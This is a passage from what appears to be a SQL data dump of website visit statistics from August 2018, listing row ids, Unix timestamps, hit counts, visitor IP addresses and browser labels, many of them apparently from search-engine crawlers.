1534825845,1,1,0,0,'54.36.148.169','other'),(291912,1534825871,1,1,0,0,'54.36.148.159','other'),(291913,1534825888,1,1,0,0,'80.252.153.33','firefox'),(291914,1534825913,1,1,0,0,'54.36.149.12','other'),(291915,1534826155,1,1,0,0,'54.36.148.145','other'),(291916,1534826197,1,1,0,0,'54.36.148.57','other'),(291917,1534826274,1,0,1,0,'66.249.66.156',''),(291918,1534826338,1,1,0,0,'54.36.148.250','other'),(291919,1534826518,1,1,0,0,'54.36.149.76','other'),(291920,1534826637,1,1,0,0,'54.36.148.22','other'),(291921,1534826912,1,1,0,0,'54.36.149.38','other'),(291922,1534827055,2,2,0,0,'216.244.66.241','other'),(291923,1534827109,1,1,0,0,'54.36.149.12','other'),(291924,1534827197,1,1,0,0,'54.36.148.87','other'),(291925,1534827340,1,1,0,0,'54.36.149.89','other'),(291926,1534827477,1,1,0,0,'54.36.148.109','other'),(291927,1534827496,1,1,0,0,'54.36.149.78','other'),(291928,1534828081,1,1,0,0,'54.36.148.47','other'),(291929,1534828110,1,1,0,0,'54.36.148.241','other'),(291930,1534828330,1,1,0,0,'54.36.148.39','other'),(291931,1534828405,1,1,0,0,'141.8.142.74','other'),(291932,1534828447,1,1,0,0,'54.36.148.54','other'),(291933,1534828707,1,1,0,0,'54.36.148.140','other'),(291934,1534828980,1,1,0,0,'54.36.148.14','other'),(291935,1534828988,1,1,0,0,'54.36.148.183','other'),(291936,1534829268,1,1,0,0,'54.36.148.90','other'),(291937,1534829368,1,1,0,0,'54.36.148.70','other'),(291938,1534829435,1,1,0,0,'8.29.198.27','other'),(291939,1534830169,1,1,0,0,'54.36.148.182','other'),(291940,1534830180,1,1,0,0,'66.249.66.156','chrome'),(291941,1534830193,1,1,0,0,'66.249.66.59','chrome'),(291942,1534830215,2,2,0,0,'54.36.148.100','other'),(291943,1534830413,1,1,0,0,'54.36.148.126','other'),(291944,1534830448,3,3,0,0,'82.207.121.233','chrome'),(291945,1534830455,1,1,0,0,'54.36.148.158','other'),(291946,1534830550,1,1,0,0,'54.36.148.131','other'),(291947,1534830611,1,1,0,0,'216.244.66.241','other'),(291948,1534830646,1,1,0,0,'141.8.142.74','other'),(291949,1534830782,1,1,0,0,'40.77.167.184','other'),(291950,1534831189,1,1,0,0,'54.36.148.82','other'),(291951,1534831337,1,1,0,0,'54.36.148.217','other'),(291952,1534831544,1,1,0,0,'54.36.148.136','other'),(291953,1534832269,1,1,0,0,'216.244.66.241','other'),(291954,1534832428,1,1,0,0,'54.36.149.72','other'),(291955,1534832619,1,1,0,0,'92.112.239.198','firefox'),(291956,1534832624,1,1,0,0,'54.36.148.131','other'),(291957,1534832833,1,1,0,0,'54.36.149.3','other'),(291958,1534833000,1,1,0,0,'54.36.148.31','other'),(291959,1534833072,1,1,0,0,'54.36.149.44','other'),(291960,1534833203,1,1,0,0,'54.36.148.101','other'),(291961,1534833227,1,1,0,0,'54.36.148.226','other'),(291962,1534833392,1,1,0,0,'176.102.220.189','chrome'),(291963,1534833627,1,1,0,0,'54.36.148.128','other'),(291964,1534833961,1,1,0,0,'91.196.178.65','other'),(291965,1534834111,1,1,0,0,'141.8.142.74','other'),(291966,1534834230,1,1,0,0,'54.36.148.148','other'),(291967,1534834270,1,1,0,0,'54.36.148.61','other'),(291968,1534834274,1,1,0,0,'54.36.148.185','other'),(291969,1534834637,1,1,0,0,'54.36.148.50','other'),(291970,1534835179,1,0,1,0,'66.249.66.155',''),(291971,1534835238,1,1,0,0,'54.36.149.91','other'),(291972,1534835267,1,1,0,0,'178.154.171.88','other'),(291973,1534835290,1,1,0,0,'54.36.148.199','other'),(291974,1534835307,1,1,0,0,'141.8.142.74','other'),(291975,1534835406,1,1,0,0,'54.36.148.82','other'),(291976,1534835594,1,1,0,0,'54.36.148.111','other'),(291977,1534835643,1,1,0,0,'54.36.148.54','other'),(291978,1534835665,1,1,0,0,'54.36.148.192','other'),(291979,1534835807,1,1,0,0,'66.249.66.157','chrome'),(291980,1534835851,1,1,0,0,'66.249.66.61','chrome'),(291981,1534835973,1,1,0,0,'40.77.167.120','other'),(291982,1534836119,1,1,0,0,'54.36.148.185','other'),(291983,1534836125,3,0,3,0,'66.249.66.156',''),(291984,1534836238,1,1,0,0,'54.36.148.234','other'),(291985,1534836340,1,1,0,0,'54.36.148.103','other'),(291986,1534836420,1,1,0,0,'54.36.148.146','other'),(291987,1534836511,1,1,0,0,'54.36.148.171','other'),(291988,1534836555,1,1,0,0,'54.36.149.67','other'),(291989,1534836666,1,1,0,0,'54.36.148.169','other'),(291990,1534836724,1,0,1,0,'66.249.66.157',''),(291991,1534837039,1,1,0,0,'95.163.255.188','other'),(291992,1534837189,1,1,0,0,'162.210.196.97','other'),(291993,1534837359,1,1,0,0,'54.36.148.198','other'),(291994,1534837698,1,1,0,0,'54.36.148.69','other'),(291995,1534837808,1,1,0,0,'54.36.149.48','other'),(291996,1534837876,1,1,0,0,'54.36.149.57','other'),(291997,1534838115,1,1,0,0,'207.46.13.95','other'),(291998,1534838245,1,1,0,0,'92.113.189.235','chrome'),(291999,1534838361,1,1,0,0,'54.36.148.33','other'),(292000,1534838445,1,0,1,0,'66.249.66.156',''),(292001,1534838501,1,1,0,0,'54.36.149.83','other'),(292002,1534838503,2,2,0,0,'78.111.185.10','chrome'),(292003,1534838813,1,1,0,0,'54.36.149.45','other'),(292004,1534838899,1,1,0,0,'54.36.148.68','other'),(292005,1534839103,1,1,0,0,'54.36.149.12','other'),(292006,1534839172,1,1,0,0,'92.113.189.235','chrome'),(292007,1534839403,1,1,0,0,'54.36.148.155','other'),(292008,1534839414,1,1,0,0,'54.36.148.98','other'),(292009,1534839416,1,1,0,0,'54.36.149.49','other'),(292010,1534839448,1,1,0,0,'54.36.148.204','other'),(292011,1534839502,1,1,0,0,'54.36.148.146','other'),(292012,1534839528,1,1,0,0,'91.196.178.70','firefox'),(292013,1534839720,1,1,0,0,'176.118.147.121','chrome'),(292014,1534839722,1,1,0,0,'54.36.149.90','other'),(292015,1534839755,1,1,0,0,'54.36.148.92','other'),(292016,1534839991,1,1,0,0,'46.211.134.8','chrome'),(292017,1534840164,1,1,0,0,'54.36.148.96','other'),(292018,1534840258,1,1,0,0,'54.36.148.152','other'),(292019,1534840273,1,1,0,0,'8.29.198.26','other'),(292020,1534840631,1,1,0,0,'141.8.142.74','other'),(292021,1534840887,1,1,0,0,'54.36.148.174','other'),(292022,1534840948,1,1,0,0,'54.36.148.234','other'),(292023,1534840982,1,1,0,0,'40.77.167.120','other'),(292024,1534841014,1,1,0,0,'54.36.148.47','other'),(292025,1534841052,1,1,0,0,'54.36.149.96','other'),(292026,1534841142,1,1,0,0,'54.36.148.23','other'),(292027,1534841172,1,1,0,0,'54.36.148.244','other'),(292028,1534841175,1,1,0,0,'54.36.148.232','other'),(292029,1534841235,1,1,0,0,'207.46.13.222','other'),(292030,1534841320,1,0,1,0,'66.249.66.61',''),(292031,1534841475,1,1,0,0,'54.36.148.95','other'),(292032,1534841513,1,0,1,0,'66.249.66.157',''),(292033,1534841587,1,1,0,0,'54.36.148.125','other'),(292034,1534842063,1,1,0,0,'66.249.66.156','chrome'),(292035,1534842074,1,1,0,0,'54.36.149.92','other'),(292036,1534842083,1,1,0,0,'66.249.66.59','chrome'),(292037,1534842170,1,1,0,0,'91.196.178.93','firefox'),(292038,1534842304,1,1,0,0,'54.36.148.122','other'),(292039,1534842386,1,1,0,0,'54.36.148.17','other'),(292040,1534842686,1,1,0,0,'54.36.148.29','other'),(292041,1534842747,1,1,0,0,'54.36.148.233','other'),(292042,1534842769,1,1,0,0,'91.196.178.53','other'),(292043,1534842823,1,1,0,0,'178.154.171.88','other'),(292044,1534842872,1,1,0,0,'54.165.59.7','other'),(292045,1534842879,1,1,0,0,'54.36.148.149','other'),(292046,1534842966,1,1,0,0,'54.36.148.241','other'),(292047,1534842998,1,1,0,0,'54.36.148.73','other'),(292048,1534843146,1,1,0,0,'54.36.149.84','other'),(292049,1534843223,1,1,0,0,'54.36.148.201','other'),(292050,1534843350,1,1,0,0,'51.255.65.46','other'),(292051,1534843451,1,1,0,0,'54.36.148.190','other'),(292052,1534843472,1,1,0,0,'54.36.148.60','other'),(292053,1534843630,1,1,0,0,'207.46.13.59','other'),(292054,1534843719,1,1,0,0,'54.36.148.123','other'),(292055,1534844037,1,1,0,0,'54.36.148.167','other'),(292056,1534844054,2,2,0,0,'91.196.178.93','firefox'),(292057,1534844297,1,1,0,0,'141.8.142.74','other'),(292058,1534844349,1,1,0,0,'54.36.148.115','other'),(292059,1534844480,1,1,0,0,'54.36.148.190','other'),(292060,1534844487,1,1,0,0,'54.36.149.43','other'),(292061,1534844544,1,0,1,0,'66.249.66.157',''),(292062,1534844586,1,1,0,0,'54.36.148.252','other'),(292063,1534844682,1,1,0,0,'216.244.66.241','other'),(292064,1534844701,1,1,0,0,'54.36.148.72','other'),(292065,1534844896,1,1,0,0,'54.36.148.74','other'),(292066,1534845295,1,1,0,0,'54.36.148.223','other'),(292067,1534845390,1,1,0,0,'54.36.149.43','other'),(292068,1534845452,1,1,0,0,'141.8.142.74','other'),(292069,1534845835,1,1,0,0,'54.36.148.193','other'),(292070,1534845905,2,2,0,0,'66.249.66.156','chrome'),(292071,1534845918,1,1,0,0,'66.249.66.61','chrome'),(292072,1534846296,1,1,0,0,'54.36.148.99','other'),(292073,1534846304,1,1,0,0,'54.36.148.158','other'),(292074,1534846384,1,1,0,0,'54.36.148.110','other'),(292075,1534846444,1,1,0,0,'54.36.149.20','other'),(292076,1534846578,1,1,0,0,'54.36.149.9','other'),(292077,1534846702,1,1,0,0,'54.36.149.99','other'),(292078,1534846822,1,1,0,0,'54.36.149.25','other'),(292079,1534846865,1,1,0,0,'91.196.178.87','chrome'),(292080,1534846867,1,1,0,0,'54.36.148.73','other'),(292081,1534847182,1,1,0,0,'54.36.149.96','other'),(292082,1534847247,1,1,0,0,'54.36.149.98','other'),(292083,1534847369,1,0,1,0,'66.249.66.57',''),(292084,1534847447,1,1,0,0,'54.36.148.118','other'),(292085,1534847782,1,1,0,0,'54.36.149.11','other'),(292086,1534848140,1,1,0,0,'54.36.148.155','other'),(292087,1534848377,1,1,0,0,'54.36.149.9','other'),(292088,1534848590,1,1,0,0,'54.36.148.69','other'),(292089,1534848731,1,1,0,0,'54.36.148.232','other'),(292090,1534849148,1,1,0,0,'158.69.116.77','other'),(292091,1534849168,1,1,0,0,'158.69.116.77','chrome'),(292092,1534849231,1,1,0,0,'54.36.149.29','other'),(292093,1534849262,1,1,0,0,'54.36.148.88','other'),(292094,1534849265,1,1,0,0,'207.46.13.95','other'),(292095,1534849311,1,1,0,0,'54.36.148.119','other'),(292096,1534849386,1,1,0,0,'54.36.148.126','other'),(292097,1534849848,1,1,0,0,'54.36.148.144','other'),(292098,1534849910,1,1,0,0,'5.53.114.152','chrome'),(292099,1534850069,1,1,0,0,'54.36.148.128','other'),(292100,1534850181,1,1,0,0,'46.211.125.214','chrome'),(292101,1534850322,1,1,0,0,'54.36.148.152','other'),(292102,1534850558,1,1,0,0,'54.36.149.17','other'),(292103,1534850766,1,1,0,0,'92.113.189.235','chrome'),(292104,1534850872,1,0,1,0,'66.249.66.57',''),(292105,1534850963,1,0,1,0,'66.249.66.155',''),(292106,1534851102,1,1,0,0,'54.36.148.255','other'),(292107,1534851109,1,1,0,0,'8.29.198.25','other'),(292108,1534851186,1,1,0,0,'40.77.167.120','other'),(292109,1534851244,1,1,0,0,'54.36.148.12','other'),(292110,1534851264,1,1,0,0,'66.249.66.156','chrome'),(292111,1534851266,1,1,0,0,'66.249.66.59','chrome'),(292112,1534851303,1,1,0,0,'54.36.148.39','other'),(292113,1534851476,1,1,0,0,'46.200.65.62','chrome'),(292114,1534852224,2,2,0,0,'188.191.233.155','chrome'),(292115,1534852270,2,2,0,0,'207.46.13.1','other'),(292116,1534852303,1,0,1,0,'66.249.66.59',''),(292117,1534852396,1,1,0,0,'54.36.149.56','other'),(292118,1534852417,1,1,0,0,'216.244.66.241','other'),(292119,1534852427,1,1,0,0,'40.77.167.120','other'),(292120,1534852432,1,1,0,0,'141.8.142.74','other'),(292121,1534852557,1,1,0,0,'54.36.148.61','other'),(292122,1534852664,1,1,0,0,'54.36.148.132','other'),(292123,1534852666,1,1,0,0,'54.36.148.101','other'),(292124,1534852816,1,1,0,0,'54.36.148.183','other'),(292125,1534852839,1,1,0,0,'54.36.148.53','other'),(292126,1534852887,1,1,0,0,'54.36.148.224','other'),(292127,1534852971,1,1,0,0,'54.36.149.84','other'),(292128,1534853049,1,1,0,0,'54.36.149.34','other'),(292129,1534853329,1,1,0,0,'178.150.244.162','chrome'),(292130,1534853353,1,1,0,0,'54.36.148.139','other'),(292131,1534853487,1,1,0,0,'54.36.148.140','other'),(292132,1534853666,1,1,0,0,'54.36.149.102','other'),(292133,1534853705,1,1,0,0,'95.163.255.108','other'),(292134,1534853832,1,1,0,0,'54.36.148.65','other'),(292135,1534853870,1,1,0,0,'54.36.148.251','other'),(292136,1534853976,1,1,0,0,'54.36.148.185','other'),(292137,1534853996,1,1,0,0,'178.154.171.88','other'),(292138,1534854117,1,1,0,0,'54.36.148.156','other'),(292139,1534854180,1,1,0,0,'207.46.13.1','other'),(292140,1534854522,1,1,0,0,'54.36.148.103','other'),(292141,1534854585,1,1,0,0,'54.36.148.113','other'),(292142,1534854748,1,1,0,0,'54.36.148.184','other'),(292143,1534854819,1,1,0,0,'54.36.149.53','other'),(292144,1534855082,1,1,0,0,'54.36.149.102','other'),(292145,1534855686,1,1,0,0,'51.255.65.46','other'),(292146,1534855733,1,0,1,0,'66.249.66.61',''),(292147,1534855779,1,1,0,0,'54.36.148.46','other'),(292148,1534856038,2,2,0,0,'91.196.178.55','chrome'),(292149,1534856090,1,0,1,0,'66.249.66.157',''),(292150,1534856306,1,0,1,0,'66.249.66.155',''),(292151,1534856328,1,1,0,0,'54.36.148.202','other'),(292152,1534856734,1,1,0,0,'66.249.66.155','chrome'),(292153,1534856737,1,1,0,0,'66.249.66.61','chrome'),(292154,1534856806,1,1,0,0,'54.36.148.228','other'),(292155,1534857012,1,1,0,0,'54.36.148.88','other'),(292156,1534857063,1,1,0,0,'54.36.148.55','other'),(292157,1534857163,1,1,0,0,'54.36.148.11','other'),(292158,1534857207,1,1,0,0,'54.36.149.34','other'),(292159,1534857293,1,1,0,0,'91.196.178.184','chrome'),(292160,1534857433,1,1,0,0,'54.36.149.22','other'),(292161,1534857516,1,1,0,0,'54.36.149.97','other'),(292162,1534857577,1,1,0,0,'54.36.149.85','other'),(292163,1534857686,1,1,0,0,'54.36.148.42','other'),(292164,1534857715,1,1,0,0,'54.36.148.10','other'),(292165,1534857721,2,0,2,0,'66.249.66.156',''),(292166,1534857852,1,1,0,0,'5.188.210.44','firefox'),(292167,1534857903,1,1,0,0,'91.196.178.93','firefox'),(292168,1534857940,1,1,0,0,'176.14.37.74','chrome'),(292169,1534858100,1,1,0,0,'195.138.65.142','firefox'),(292170,1534858109,1,1,0,0,'54.36.148.106','other'),(292171,1534858186,1,1,0,0,'107.21.1.8','other'),(292172,1534858267,1,1,0,0,'54.36.149.0','other'),(292173,1534858298,1,1,0,0,'54.36.149.10','other'),(292174,1534858343,1,1,0,0,'54.36.148.98','other'),(292175,1534858547,1,1,0,0,'91.196.178.169','chrome'),(292176,1534858565,1,1,0,0,'195.64.190.1','chrome'),(292177,1534858668,1,1,0,0,'54.36.149.76','other'),(292178,1534858803,1,1,0,0,'87.250.224.46','other'),(292179,1534858849,1,1,0,0,'54.36.148.179','other'),(292180,1534859257,1,1,0,0,'54.36.148.88','other'),(292181,1534859352,1,1,0,0,'54.36.148.109','other'),(292182,1534859432,1,1,0,0,'54.36.149.99','other'),(292183,1534859645,1,1,0,0,'54.36.148.223','other'),(292184,1534859718,1,0,1,0,'66.249.66.157',''),(292185,1534859848,1,1,0,0,'54.36.148.242','other'),(292186,1534860656,1,1,0,0,'54.36.148.231','other'),(292187,1534860908,1,1,0,0,'93.74.210.191','chrome'),(292188,1534860978,1,1,0,0,'54.36.149.89','other'),(292189,1534861024,1,1,0,0,'54.36.149.30','other'),(292190,1534861364,1,1,0,0,'82.207.49.122','chrome'),(292191,1534861390,1,1,0,0,'82.207.15.246','chrome'),(292192,1534861424,1,1,0,0,'54.36.148.237','other'),(292193,1534861679,1,1,0,0,'37.9.113.182','other'),(292194,1534861769,1,1,0,0,'54.36.149.93','other'),(292195,1534861805,1,1,0,0,'62.19.163.133','other'),(292196,1534861921,1,1,0,0,'54.36.148.17','other'),(292197,1534861947,1,1,0,0,'8.29.198.27','other'),(292198,1534861950,1,1,0,0,'54.36.148.227','other'),(292199,1534861981,1,1,0,0,'54.36.148.117','other'),(292200,1534862310,1,1,0,0,'207.46.13.135','other'),(292201,1534862413,1,1,0,0,'66.249.66.155','chrome'),(292202,1534862417,1,1,0,0,'66.249.66.61','chrome'),(292203,1534862498,1,1,0,0,'54.36.149.56','other'),(292204,1534862950,1,1,0,0,'54.36.148.125','other'),(292205,1534863012,1,1,0,0,'54.36.149.49','other'),(292206,1534863017,1,1,0,0,'54.36.149.46','other'),(292207,1534863025,1,1,0,0,'54.36.149.63','other'),(292208,1534863125,1,1,0,0,'5.188.210.44','firefox'),(292209,1534863216,1,1,0,0,'54.36.148.174','other'),(292210,1534863269,1,1,0,0,'54.36.148.74','other'),(292211,1534863412,1,1,0,0,'54.36.148.241','other'),(292212,1534863450,1,1,0,0,'54.36.148.126','other'),(292213,1534863718,2,0,2,0,'66.249.66.156',''),(292214,1534863791,1,1,0,0,'141.8.142.74','other'),(292215,1534863928,1,1,0,0,'54.165.59.7','other'),(292216,1534864096,1,1,0,0,'54.36.148.161','other'),(292217,1534864889,1,1,0,0,'54.36.149.103','other'),(292218,1534864908,1,1,0,0,'54.36.148.155','other'),(292219,1534865086,1,1,0,0,'54.36.148.109','other'),(292220,1534865228,1,1,0,0,'54.36.149.0','other'),(292221,1534865261,1,1,0,0,'54.36.148.143','other'),(292222,1534865262,1,1,0,0,'54.36.149.98','other'),(292223,1534865413,1,1,0,0,'54.36.149.39','other'),(292224,1534865560,1,1,0,0,'54.36.148.166','other'),(292225,1534865579,1,1,0,0,'54.36.148.98','other'),(292226,1534865640,1,1,0,0,'54.36.148.158','other'),(292227,1534865647,1,1,0,0,'54.165.59.7','other'),(292228,1534865765,1,0,1,0,'66.249.66.155',''),(292229,1534865869,1,1,0,0,'54.36.149.99','other'),(292230,1534865896,1,1,0,0,'54.36.148.184','other'),(292231,1534865915,1,1,0,0,'54.36.149.72','other'),(292232,1534865928,1,1,0,0,'54.36.148.88','other'),(292233,1534865991,1,1,0,0,'54.36.148.177','other'),(292234,1534866020,1,1,0,0,'5.9.151.57','other'),(292235,1534866362,1,0,1,0,'66.249.66.157',''),(292236,1534866495,1,1,0,0,'188.138.102.150','other'),(292237,1534866497,1,1,0,0,'188.138.75.77','chrome'),(292238,1534866794,1,1,0,0,'54.36.148.75','other'),(292239,1534866822,1,1,0,0,'216.244.66.241','other'),(292240,1534866975,1,1,0,0,'54.36.149.15','other'),(292241,1534867017,1,1,0,0,'54.36.148.106','other'),(292242,1534867108,1,1,0,0,'54.36.148.196','other'),(292243,1534867188,1,1,0,0,'54.36.149.85','other'),(292244,1534867394,1,1,0,0,'66.249.66.153','chrome'),(292245,1534867399,1,1,0,0,'66.249.66.59','chrome'),(292246,1534867481,1,1,0,0,'54.36.149.79','other'),(292247,1534867655,1,1,0,0,'54.36.148.132','other'),(292248,1534867977,1,1,0,0,'141.8.142.74','other'),(292249,1534868105,1,1,0,0,'54.36.148.10','other'),(292250,1534868212,1,1,0,0,'216.244.66.241','other'),(292251,1534868662,1,1,0,0,'54.165.59.7','other'),(292252,1534868746,1,1,0,0,'54.36.148.209','other'),(292253,1534868797,1,1,0,0,'54.36.149.62','other'),(292254,1534869108,1,1,0,0,'54.36.148.221','other'),(292255,1534869171,1,1,0,0,'54.36.148.45','other'),(292256,1534869233,2,2,0,0,'54.36.148.32','other'),(292257,1534869387,1,1,0,0,'54.36.148.79','other'),(292258,1534869445,1,1,0,0,'54.36.148.214','other'),(292259,1534869516,2,0,2,0,'66.249.66.156',''),(292260,1534869590,1,1,0,0,'54.36.148.135','other'),(292261,1534869771,1,1,0,0,'188.230.43.254','other'),(292262,1534870033,1,1,0,0,'54.36.148.147','other'),(292263,1534870174,1,0,1,0,'66.249.66.157',''),(292264,1534870182,1,1,0,0,'5.166.158.64','chrome'),(292265,1534870553,1,1,0,0,'54.36.149.78','other'),(292266,1534870914,1,1,0,0,'54.36.148.233','other'),(292267,1534871038,1,1,0,0,'54.36.149.7','other'),(292268,1534871082,1,1,0,0,'216.244.66.241','other'),(292269,1534871224,1,0,1,0,'66.249.66.155',''),(292270,1534871324,1,1,0,0,'91.196.178.87','firefox'),(292271,1534871325,1,1,0,0,'54.36.148.162','other'),(292272,1534871353,1,1,0,0,'54.36.148.108','other'),(292273,1534871457,1,1,0,0,'54.36.148.12','other'),(292274,1534871505,1,1,0,0,'54.36.149.39','other'),(292275,1534871547,1,1,0,0,'54.36.148.216','other'),(292276,1534871646,1,1,0,0,'54.36.148.237','other'),(292277,1534871714,1,1,0,0,'54.36.149.31','other'),(292278,1534871835,1,1,0,0,'54.36.149.102','other'),(292279,1534871952,1,1,0,0,'54.36.148.188','other'),(292280,1534871972,1,1,0,0,'54.36.149.36','other'),(292281,1534872035,1,1,0,0,'54.36.149.85','other'),(292282,1534872067,1,1,0,0,'95.163.255.98','other'),(292283,1534872167,1,1,0,0,'188.230.43.254','other'),(292284,1534872434,1,1,0,0,'207.46.13.125','other'),(292285,1534872451,1,1,0,0,'54.36.149.93','other'),(292286,1534872492,1,1,0,0,'54.36.148.113','other'),(292287,1534872559,1,1,0,0,'54.36.148.212','other'),(292288,1534872580,1,1,0,0,'66.249.66.59','chrome'),(292289,1534872664,1,1,0,0,'216.244.66.241','other'),(292290,1534872860,1,1,0,0,'54.36.148.136','other'),(292291,1534873067,1,1,0,0,'92.113.189.235','chrome'),(292292,1534873253,1,1,0,0,'54.36.148.10','other'),(292293,1534873289,1,1,0,0,'8.29.198.27','other'),(292294,1534873395,1,1,0,0,'54.36.148.31','other'),(292295,1534873572,1,1,0,0,'54.36.148.104','other'),(292296,1534873645,1,1,0,0,'54.36.149.48','other'),(292297,1534873707,1,1,0,0,'54.36.148.107','other'),(292298,1534873731,1,1,0,0,'141.8.142.74','other'),(292299,1534873739,1,1,0,0,'207.46.13.179','other'),(292300,1534873773,1,1,0,0,'54.36.149.97','other'),(292301,1534873782,1,1,0,0,'66.249.66.156','chrome'),(292302,1534873833,1,1,0,0,'54.36.148.15','other'),(292303,1534873871,1,1,0,0,'54.36.148.156','other'),(292304,1534874207,1,1,0,0,'54.36.148.215','other'),(292305,1534874224,1,1,0,0,'54.36.148.163','other'),(292306,1534874327,1,1,0,0,'157.55.39.116','other'),(292307,1534874446,1,1,0,0,'54.36.149.33','other'),(292308,1534874537,1,1,0,0,'54.36.148.82','other'),(292309,1534874539,1,0,1,0,'66.249.66.155',''),(292310,1534874574,1,1,0,0,'188.230.43.254','other'),(292311,1534874737,1,0,1,0,'66.249.66.156',''),(292312,1534874847,1,1,0,0,'54.36.148.254','other'),(292313,1534874874,1,1,0,0,'141.8.142.74','other'),(292314,1534875133,1,1,0,0,'95.163.255.189','other'),(292315,1534875536,1,1,0,0,'54.36.148.88','other'),(292316,1534875802,1,1,0,0,'54.36.148.163','other'),(292317,1534875884,2,2,0,0,'54.36.148.75','other'),(292318,1534876060,1,1,0,0,'54.36.148.225','other'),(292319,1534876086,1,1,0,0,'54.36.148.104','other'),(292320,1534876132,1,1,0,0,'54.36.148.128','other'),(292321,1534876235,1,1,0,0,'54.36.149.38','other'),(292322,1534876420,1,1,0,0,'54.36.148.84','other'),(292323,1534876533,1,0,1,0,'66.249.66.156',''),(292324,1534876704,1,1,0,0,'54.36.148.39','other'),(292325,1534876728,1,1,0,0,'54.36.148.26','other'),(292326,1534876814,1,1,0,0,'54.36.149.58','other'),(292327,1534876855,1,1,0,0,'66.249.66.59','chrome'),(292328,1534877150,1,1,0,0,'54.36.148.153','other'),(292329,1534877427,1,0,1,0,'66.249.66.61',''),(292330,1534877434,1,1,0,0,'54.36.148.254','other'),(292331,1534877465,1,1,0,0,'139.59.174.121','other'),(292332,1534877644,1,1,0,0,'54.36.149.38','other'),(292333,1534877679,1,1,0,0,'54.36.148.180','other'),(292334,1534878021,1,1,0,0,'54.36.148.159','other'),(292335,1534878022,1,1,0,0,'54.36.148.75','other'),(292336,1534878125,1,1,0,0,'54.36.148.90','other'),(292337,1534878152,1,1,0,0,'54.36.149.0','other'),(292338,1534878478,1,1,0,0,'178.154.171.88','other'),(292339,1534878816,1,1,0,0,'40.77.167.193','other'),(292340,1534879030,1,1,0,0,'54.36.148.148','other'),(292341,1534879070,1,1,0,0,'141.8.142.74','other'),(292342,1534879389,1,1,0,0,'54.36.148.176','other'),(292343,1534879605,1,1,0,0,'54.36.148.180','other'),(292344,1534879789,1,1,0,0,'66.249.66.157','chrome'),(292345,1534880006,1,1,0,0,'46.211.116.80','chrome'),(292346,1534880254,1,1,0,0,'54.36.149.32','other'),(292347,1534880747,1,1,0,0,'54.36.148.24','other'),(292348,1534880851,1,1,0,0,'54.36.148.236','other'),(292349,1534880910,1,1,0,0,'54.36.149.88','other'),(292350,1534881064,2,0,2,0,'66.249.66.156',''),(292351,1534881175,1,1,0,0,'54.36.148.56','other'),(292352,1534881261,1,1,0,0,'5.188.210.44','firefox'),(292353,1534881496,1,1,0,0,'77.234.46.166','other'),(292354,1534881577,1,1,0,0,'54.36.149.26','other'),(292355,1534881694,1,1,0,0,'54.36.148.133','other'),(292356,1534881967,1,1,0,0,'66.249.66.59','chrome'),(292357,1534882222,1,1,0,0,'54.36.148.135','other'),(292358,1534882318,1,1,0,0,'54.36.148.74','other'),(292359,1534882391,1,1,0,0,'54.36.148.47','other'),(292360,1534882454,1,1,0,0,'54.36.149.53','other'),(292361,1534882503,2,2,0,0,'216.244.66.241','other'),(292362,1534882633,1,1,0,0,'207.46.13.125','other'),(292363,1534882648,1,1,0,0,'54.36.148.179','other'),(292364,1534882849,1,1,0,0,'54.36.149.44','other'),(292365,1534883186,1,1,0,0,'54.36.148.234','other'),(292366,1534883506,2,2,0,0,'141.8.142.74','other'),(292367,1534883719,1,1,0,0,'54.36.148.33','other'),(292368,1534883929,1,1,0,0,'66.249.66.155','chrome'),(292369,1534884225,1,1,0,0,'8.29.198.25','other'),(292370,1534884452,1,1,0,0,'95.163.255.97','other'),(292371,1534884907,1,1,0,0,'54.36.149.9','other'),(292372,1534884942,1,1,0,0,'54.36.148.187','other'),(292373,1534884995,1,0,1,0,'66.249.66.157',''),(292374,1534885202,1,1,0,0,'141.8.142.74','other'),(292375,1534885282,1,1,0,0,'54.36.149.55','other'),(292376,1534885302,1,1,0,0,'54.165.59.7','other'),(292377,1534885393,1,1,0,0,'54.36.148.168','other'),(292378,1534885832,1,1,0,0,'66.249.66.59','chrome'),(292379,1534886244,1,1,0,0,'54.36.148.197','other'),(292380,1534886273,1,1,0,0,'54.36.148.14','other'),(292381,1534886416,1,0,1,0,'66.249.66.157',''),(292382,1534886840,1,1,0,0,'54.36.148.108','other'),(292383,1534886985,1,1,0,0,'54.36.148.156','other'),(292384,1534887159,1,0,1,0,'66.249.66.59',''),(292385,1534887360,1,1,0,0,'54.36.148.107','other'),(292386,1534887602,1,1,0,0,'54.36.148.163','other'),(292387,1534887680,1,1,0,0,'54.36.148.110','other'),(292388,1534887809,1,1,0,0,'54.36.148.195','other'),(292389,1534888164,1,1,0,0,'54.36.148.255','other'),(292390,1534888376,1,1,0,0,'54.36.148.87','other'),(292391,1534888484,1,1,0,0,'54.36.148.209','other'),(292392,1534888525,1,1,0,0,'54.36.148.53','other'),(292393,1534888539,1,1,0,0,'54.36.149.105','other'),(292394,1534888668,1,1,0,0,'54.36.148.161','other'),(292395,1534888741,1,1,0,0,'54.36.149.10','other'),(292396,1534889005,1,1,0,0,'54.36.148.189','other'),(292397,1534889027,1,1,0,0,'66.249.66.155','chrome'),(292398,1534889147,1,1,0,0,'54.36.148.136','other'),(292399,1534889718,1,1,0,0,'54.36.148.101','other'),(292400,1534889789,1,1,0,0,'141.8.142.74','other'),(292401,1534890022,1,1,0,0,'54.36.148.84','other'),(292402,1534890581,1,1,0,0,'216.244.66.241','other'),(292403,1534890709,1,1,0,0,'54.36.148.15','other'),(292404,1534890997,1,1,0,0,'54.36.148.226','other'),(292405,1534891054,2,2,0,0,'141.8.142.74','other'),(292406,1534891241,1,1,0,0,'54.36.148.143','other'),(292407,1534891391,1,1,0,0,'54.36.148.244','other'),(292408,1534891422,1,1,0,0,'54.36.148.94','other'),(292409,1534891629,1,1,0,0,'54.36.149.68','other'),(292410,1534891662,1,1,0,0,'54.36.148.229','other'),(292411,1534891755,1,1,0,0,'54.36.148.230','other'),(292412,1534891780,1,1,0,0,'54.36.148.41','other'),(292413,1534892001,1,1,0,0,'54.36.148.159','other'),(292414,1534892222,1,1,0,0,'54.36.148.165','other'),(292415,1534892531,1,1,0,0,'66.249.66.57','chrome'),(292416,1534892655,1,1,0,0,'54.36.148.198','other'),(292417,1534892738,1,1,0,0,'54.36.148.41','other'),(292418,1534892790,1,1,0,0,'54.36.148.142','other'),(292419,1534892791,1,1,0,0,'54.36.148.195','other'),(292420,1534893386,1,1,0,0,'54.36.148.187','other'),(292421,1534893819,1,1,0,0,'92.113.190.168','chrome'),(292422,1534894087,1,1,0,0,'207.46.13.114','other'),(292423,1534894320,1,1,0,0,'54.36.149.3','other'),(292424,1534894767,1,1,0,0,'178.154.200.41','other'),(